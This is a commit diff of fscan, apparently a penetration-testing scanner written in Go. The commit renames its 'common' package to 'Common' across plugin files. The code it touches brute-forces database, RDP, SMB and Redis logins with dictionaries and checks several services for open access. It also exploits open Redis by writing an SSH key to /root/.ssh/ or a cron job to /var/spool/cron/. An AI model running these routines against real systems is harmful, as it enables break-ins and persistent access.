dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second) dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName) db, err := sql.Open("mssql", dataSourceName)
if err == nil { if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0) db.SetMaxIdleConns(0)
defer db.Close() defer db.Close()
err = db.Ping() err = db.Ping()
if err == nil { if err == nil {
result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password) result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result) Common.LogSuccess(result)
flag = true flag = true
} }
} }

10
Plugins/memcached.go → Plugins/Memcached.go
View File

@ -2,22 +2,22 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func MemcachedScan(info *Config.HostInfo) (err error) { func MemcachedScan(info *Config.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) client, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
defer func() { defer func() {
if client != nil { if client != nil {
client.Close() client.Close()
} }
}() }()
if err == nil { if err == nil {
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = client.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err == nil { if err == nil {
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten _, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil { if err == nil {
@ -26,11 +26,11 @@ func MemcachedScan(info *Config.HostInfo) (err error) {
if err == nil { if err == nil {
if strings.Contains(string(rev[:n]), "STAT") { if strings.Contains(string(rev[:n]), "STAT") {
result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost) result := fmt.Sprintf("[+] Memcached %s unauthorized", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
} }
} else { } else {
errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err) errlog := fmt.Sprintf("[-] Memcached %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog) Common.LogError(errlog)
} }
} }
} }

12
Plugins/mongodb.go → Plugins/Mongodb.go
View File

@ -2,20 +2,20 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func MongodbScan(info *Config.HostInfo) error { func MongodbScan(info *Config.HostInfo) error {
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
_, err := MongodbUnauth(info) _, err := MongodbUnauth(info)
if err != nil { if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err) errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog) Common.LogError(errlog)
} }
return err return err
} }
@ -49,12 +49,12 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
checkUnAuth := func(address string, packet []byte) (string, error) { checkUnAuth := func(address string, packet []byte) (string, error) {
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return "", err return "", err
} }
defer conn.Close() defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return "", err return "", err
} }
@ -81,7 +81,7 @@ func MongodbUnauth(info *Config.HostInfo) (flag bool, err error) {
if strings.Contains(reply, "totalLinesWritten") { if strings.Contains(reply, "totalLinesWritten") {
flag = true flag = true
result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost) result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
} }
return flag, err return flag, err
} }

22
Plugins/mysql.go → Plugins/MySQL.go
View File

@ -4,31 +4,31 @@ import (
"database/sql" "database/sql"
"fmt" "fmt"
_ "github.com/go-sql-driver/mysql" _ "github.com/go-sql-driver/mysql"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func MysqlScan(info *Config.HostInfo) (tmperr error) { func MysqlScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
for _, user := range common.Userdict["mysql"] { for _, user := range Common.Userdict["mysql"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MysqlConn(info, user, pass) flag, err := MysqlConn(info, user, pass)
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) errlog := fmt.Sprintf("[-] mysql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mysql"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -40,17 +40,17 @@ func MysqlScan(info *Config.HostInfo) (tmperr error) {
func MysqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { func MysqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second) dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(Common.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName) db, err := sql.Open("mysql", dataSourceName)
if err == nil { if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0) db.SetMaxIdleConns(0)
defer db.Close() defer db.Close()
err = db.Ping() err = db.Ping()
if err == nil { if err == nil {
result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password) result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result) Common.LogSuccess(result)
flag = true flag = true
} }
} }

12
Plugins/NetBIOS.go
View File

@ -4,8 +4,8 @@ import (
"bytes" "bytes"
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"gopkg.in/yaml.v3" "gopkg.in/yaml.v3"
"net" "net"
"strconv" "strconv"
@ -20,7 +20,7 @@ func NetBIOS(info *Config.HostInfo) error {
output := netbios.String() output := netbios.String()
if len(output) > 0 { if len(output) > 0 {
result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output) result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output)
common.LogSuccess(result) Common.LogSuccess(result)
return nil return nil
} }
return errNetBIOS return errNetBIOS
@ -41,12 +41,12 @@ func NetBIOS1(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
} }
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
var conn net.Conn var conn net.Conn
conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) conn, err = Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return return
} }
defer conn.Close() defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return return
} }
@ -89,12 +89,12 @@ func GetNbnsname(info *Config.HostInfo) (netbios NetBiosInfo, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1} senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
//senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01") //senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01")
realhost := fmt.Sprintf("%s:137", info.Host) realhost := fmt.Sprintf("%s:137", info.Host)
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second) conn, err := net.DialTimeout("udp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return return
} }
defer conn.Close() defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return return
} }

20
Plugins/oracle.go → Plugins/Oracle.go
View File

@ -3,32 +3,32 @@ package Plugins
import ( import (
"database/sql" "database/sql"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
_ "github.com/sijms/go-ora/v2" _ "github.com/sijms/go-ora/v2"
"strings" "strings"
"time" "time"
) )
func OracleScan(info *Config.HostInfo) (tmperr error) { func OracleScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
for _, user := range common.Userdict["oracle"] { for _, user := range Common.Userdict["oracle"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
flag, err := OracleConn(info, user, pass) flag, err := OracleConn(info, user, pass)
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) errlog := fmt.Sprintf("[-] oracle %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["oracle"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -43,14 +43,14 @@ func OracleConn(info *Config.HostInfo, user string, pass string) (flag bool, err
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port) dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
db, err := sql.Open("oracle", dataSourceName) db, err := sql.Open("oracle", dataSourceName)
if err == nil { if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxIdleTime(time.Duration(Common.Timeout) * time.Second)
db.SetMaxIdleConns(0) db.SetMaxIdleConns(0)
defer db.Close() defer db.Close()
err = db.Ping() err = db.Ping()
if err == nil { if err == nil {
result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password) result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result) Common.LogSuccess(result)
flag = true flag = true
} }
} }

16
Plugins/portscan.go → Plugins/PortScan.go
View File

@ -2,7 +2,7 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/common" "github.com/shadow1ng/fscan/Common"
"sort" "sort"
"strconv" "strconv"
"sync" "sync"
@ -16,12 +16,12 @@ type Addr struct {
func PortScan(hostslist []string, ports string, timeout int64) []string { func PortScan(hostslist []string, ports string, timeout int64) []string {
var AliveAddress []string var AliveAddress []string
probePorts := common.ParsePort(ports) probePorts := Common.ParsePort(ports)
if len(probePorts) == 0 { if len(probePorts) == 0 {
fmt.Printf("[-] parse port %s error, please check your port format\n", ports) fmt.Printf("[-] parse port %s error, please check your port format\n", ports)
return AliveAddress return AliveAddress
} }
noPorts := common.ParsePort(common.NoPorts) noPorts := Common.ParsePort(Common.NoPorts)
if len(noPorts) > 0 { if len(noPorts) > 0 {
temp := map[int]struct{}{} temp := map[int]struct{}{}
for _, port := range probePorts { for _, port := range probePorts {
@ -39,7 +39,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
probePorts = newDatas probePorts = newDatas
sort.Ints(probePorts) sort.Ints(probePorts)
} }
workers := common.Threads workers := Common.Threads
Addrs := make(chan Addr, 100) Addrs := make(chan Addr, 100)
results := make(chan string, 100) results := make(chan string, 100)
var wg sync.WaitGroup var wg sync.WaitGroup
@ -77,20 +77,20 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
host, port := addr.ip, addr.port host, port := addr.ip, addr.port
conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
if err == nil { if err == nil {
defer conn.Close() defer conn.Close()
address := host + ":" + strconv.Itoa(port) address := host + ":" + strconv.Itoa(port)
result := fmt.Sprintf("%s open", address) result := fmt.Sprintf("%s open", address)
common.LogSuccess(result) Common.LogSuccess(result)
wg.Add(1) wg.Add(1)
respondingHosts <- address respondingHosts <- address
} }
} }
func NoPortScan(hostslist []string, ports string) (AliveAddress []string) { func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
probePorts := common.ParsePort(ports) probePorts := Common.ParsePort(ports)
noPorts := common.ParsePort(common.NoPorts) noPorts := Common.ParsePort(Common.NoPorts)
if len(noPorts) > 0 { if len(noPorts) > 0 {
temp := map[int]struct{}{} temp := map[int]struct{}{}
for _, port := range probePorts { for _, port := range probePorts {

18
Plugins/postgres.go → Plugins/Postgres.go
View File

@ -4,31 +4,31 @@ import (
"database/sql" "database/sql"
"fmt" "fmt"
_ "github.com/lib/pq" _ "github.com/lib/pq"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func PostgresScan(info *Config.HostInfo) (tmperr error) { func PostgresScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
for _, user := range common.Userdict["postgresql"] { for _, user := range Common.Userdict["postgresql"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1) pass = strings.Replace(pass, "{user}", string(user), -1)
flag, err := PostgresConn(info, user, pass) flag, err := PostgresConn(info, user, pass)
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["postgresql"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -43,12 +43,12 @@ func PostgresConn(info *Config.HostInfo, user string, pass string) (flag bool, e
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable") dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName) db, err := sql.Open("postgres", dataSourceName)
if err == nil { if err == nil {
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second) db.SetConnMaxLifetime(time.Duration(Common.Timeout) * time.Second)
defer db.Close() defer db.Close()
err = db.Ping() err = db.Ping()
if err == nil { if err == nil {
result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password) result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result) Common.LogSuccess(result)
flag = true flag = true
} }
} }

20
Plugins/rdp.go → Plugins/RDP.go
View File

@ -3,8 +3,8 @@ package Plugins
import ( import (
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"github.com/tomatome/grdp/core" "github.com/tomatome/grdp/core"
"github.com/tomatome/grdp/glog" "github.com/tomatome/grdp/glog"
"github.com/tomatome/grdp/protocol/nla" "github.com/tomatome/grdp/protocol/nla"
@ -28,25 +28,25 @@ type Brutelist struct {
} }
func RdpScan(info *Config.HostInfo) (tmperr error) { func RdpScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
var wg sync.WaitGroup var wg sync.WaitGroup
var signal bool var signal bool
var num = 0 var num = 0
var all = len(common.Userdict["rdp"]) * len(common.Passwords) var all = len(Common.Userdict["rdp"]) * len(Common.Passwords)
var mutex sync.Mutex var mutex sync.Mutex
brlist := make(chan Brutelist) brlist := make(chan Brutelist)
port, _ := strconv.Atoi(info.Ports) port, _ := strconv.Atoi(info.Ports)
for i := 0; i < common.BruteThread; i++ { for i := 0; i < Common.BruteThread; i++ {
wg.Add(1) wg.Add(1)
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout) go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout)
} }
for _, user := range common.Userdict["rdp"] { for _, user := range Common.Userdict["rdp"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
brlist <- Brutelist{user, pass} brlist <- Brutelist{user, pass}
} }
@ -78,12 +78,12 @@ func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brute
} else { } else {
result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass) result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass)
} }
common.LogSuccess(result) Common.LogSuccess(result)
*signal = true *signal = true
return return
} else { } else {
errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err) errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
} }
} }
} }
@ -126,7 +126,7 @@ func NewClient(host string, logLevel glog.LEVEL) *Client {
} }
func (g *Client) Login(domain, user, pwd string, timeout int64) error { func (g *Client) Login(domain, user, pwd string, timeout int64) error {
conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
if err != nil { if err != nil {
return fmt.Errorf("[dial err] %v", err) return fmt.Errorf("[dial err] %v", err)
} }

46
Plugins/redis.go → Plugins/Redis.go
View File

@ -3,8 +3,8 @@ package Plugins
import ( import (
"bufio" "bufio"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io" "io"
"net" "net"
"os" "os"
@ -23,22 +23,22 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} }
if common.IsBrute { if Common.IsBrute {
return return
} }
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", "redis", -1) pass = strings.Replace(pass, "{user}", "redis", -1)
flag, err := RedisConn(info, pass) flag, err := RedisConn(info, pass)
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err) errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -49,12 +49,12 @@ func RedisScan(info *Config.HostInfo) (tmperr error) {
func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) { func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
flag = false flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return flag, err return flag, err
} }
defer conn.Close() defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return flag, err return flag, err
} }
@ -71,11 +71,11 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn) dbfilename, dir, err = getconfig(conn)
if err != nil { if err != nil {
result := fmt.Sprintf("[+] Redis %s %s", realhost, pass) result := fmt.Sprintf("[+] Redis %s %s", realhost, pass)
common.LogSuccess(result) Common.LogSuccess(result)
return flag, err return flag, err
} else { } else {
result := fmt.Sprintf("[+] Redis %s %s file:%s/%s", realhost, pass, dir, dbfilename) result := fmt.Sprintf("[+] Redis %s %s file:%s/%s", realhost, pass, dir, dbfilename)
common.LogSuccess(result) Common.LogSuccess(result)
} }
err = Expoilt(realhost, conn) err = Expoilt(realhost, conn)
} }
@ -85,12 +85,12 @@ func RedisConn(info *Config.HostInfo, pass string) (flag bool, err error) {
func RedisUnauth(info *Config.HostInfo) (flag bool, err error) { func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
flag = false flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return flag, err return flag, err
} }
defer conn.Close() defer conn.Close()
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetReadDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return flag, err return flag, err
} }
@ -107,11 +107,11 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
dbfilename, dir, err = getconfig(conn) dbfilename, dir, err = getconfig(conn)
if err != nil { if err != nil {
result := fmt.Sprintf("[+] Redis %s unauthorized", realhost) result := fmt.Sprintf("[+] Redis %s unauthorized", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
return flag, err return flag, err
} else { } else {
result := fmt.Sprintf("[+] Redis %s unauthorized file:%s/%s", realhost, dir, dbfilename) result := fmt.Sprintf("[+] Redis %s unauthorized file:%s/%s", realhost, dir, dbfilename)
common.LogSuccess(result) Common.LogSuccess(result)
} }
err = Expoilt(realhost, conn) err = Expoilt(realhost, conn)
} }
@ -119,7 +119,7 @@ func RedisUnauth(info *Config.HostInfo) (flag bool, err error) {
} }
func Expoilt(realhost string, conn net.Conn) error { func Expoilt(realhost string, conn net.Conn) error {
if common.Noredistest { if Common.Noredistest {
return nil return nil
} }
flagSsh, flagCron, err := testwrite(conn) flagSsh, flagCron, err := testwrite(conn)
@ -128,16 +128,16 @@ func Expoilt(realhost string, conn net.Conn) error {
} }
if flagSsh == true { if flagSsh == true {
result := fmt.Sprintf("[+] Redis %v like can write /root/.ssh/", realhost) result := fmt.Sprintf("[+] Redis %v like can write /root/.ssh/", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
if common.RedisFile != "" { if Common.RedisFile != "" {
writeok, text, err := writekey(conn, common.RedisFile) writeok, text, err := writekey(conn, Common.RedisFile)
if err != nil { if err != nil {
fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text)) fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
return err return err
} }
if writeok { if writeok {
result := fmt.Sprintf("[+] Redis %v SSH public key was written successfully", realhost) result := fmt.Sprintf("[+] Redis %v SSH public key was written successfully", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
} else { } else {
fmt.Println("[-] Redis ", realhost, "SSHPUB write failed", text) fmt.Println("[-] Redis ", realhost, "SSHPUB write failed", text)
} }
@ -146,15 +146,15 @@ func Expoilt(realhost string, conn net.Conn) error {
if flagCron == true { if flagCron == true {
result := fmt.Sprintf("[+] Redis %v like can write /var/spool/cron/", realhost) result := fmt.Sprintf("[+] Redis %v like can write /var/spool/cron/", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
if common.RedisShell != "" { if Common.RedisShell != "" {
writeok, text, err := writecron(conn, common.RedisShell) writeok, text, err := writecron(conn, Common.RedisShell)
if err != nil { if err != nil {
return err return err
} }
if writeok { if writeok {
result := fmt.Sprintf("[+] Redis %v /var/spool/cron/root was written successfully", realhost) result := fmt.Sprintf("[+] Redis %v /var/spool/cron/root was written successfully", realhost)
common.LogSuccess(result) Common.LogSuccess(result)
} else { } else {
fmt.Println("[-] Redis ", realhost, "cron write failed", text) fmt.Println("[-] Redis ", realhost, "cron write failed", text)
} }

24
Plugins/smb.go → Plugins/SMB.go
View File

@ -3,8 +3,8 @@ package Plugins
import ( import (
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"github.com/stacktitan/smb/smb" "github.com/stacktitan/smb/smb"
"strings" "strings"
"time" "time"
@ -13,15 +13,15 @@ import (
// SmbScan 执行SMB服务的认证扫描 // SmbScan 执行SMB服务的认证扫描
func SmbScan(info *Config.HostInfo) (tmperr error) { func SmbScan(info *Config.HostInfo) (tmperr error) {
// 如果未启用暴力破解则直接返回 // 如果未启用暴力破解则直接返回
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
startTime := time.Now().Unix() startTime := time.Now().Unix()
// 遍历用户名和密码字典进行认证尝试 // 遍历用户名和密码字典进行认证尝试
for _, user := range common.Userdict["smb"] { for _, user := range Common.Userdict["smb"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
// 替换密码中的用户名占位符 // 替换密码中的用户名占位符
